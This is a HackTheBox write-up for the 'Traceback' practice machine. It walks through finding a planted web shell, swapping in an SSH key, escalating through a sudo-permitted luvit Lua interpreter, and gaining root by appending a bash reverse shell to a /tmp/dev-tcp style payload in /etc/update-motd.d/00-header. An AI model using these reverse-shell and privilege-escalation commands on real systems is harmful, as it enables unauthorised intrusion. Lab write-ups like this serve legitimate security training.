Aug 17, 2020
HackTheBox — Traceback
Summary
Traceback is a easy flag with ip 10.10.10.181
Enumeration
Nmap
Web Enum
I tried to take a look for source
From the hint, I searched for Xh4H web shells, I found some shells
I dumped all shells names on txt file and used gobuster
I used admin:admin credentials to login
After that i deleted the default authorized_keys and upload my one
Let’s login now
Get user sysadmin
$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvitAfetr searching about lua
Create lua command shell:
echo "local t = os.execute('/bin/sh')" > rev.luaexecute rev.lua as sysadmin without password to get user:
sudo -u sysadmin /home/sysadmin/luvit rev.lua
Gain user flag!
Privilege Escalation
Enumerating the box using linpeas we see that we can modify files inside /etc/update-motd.d
I found this article that took about mot.d
I added a bash rev shell to 00-header
echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/4334 0>&1'" >> /etc/update-motd.d/00-headerlisten on port 4334 and ssh to the box from another terminal
Now if we ssh as webadmin, Should get root
root@strike:~# ssh -i id_rsa webadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
8c221146c17c2a973a846f49xxxxxxxx
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Aug 15 06:23:37 2020 from 10.10.14.53
webadmin@traceback:~$Gain root flag!
If u learn any thing useful from write up, Respect me on HackTheBox
THX for ur time!
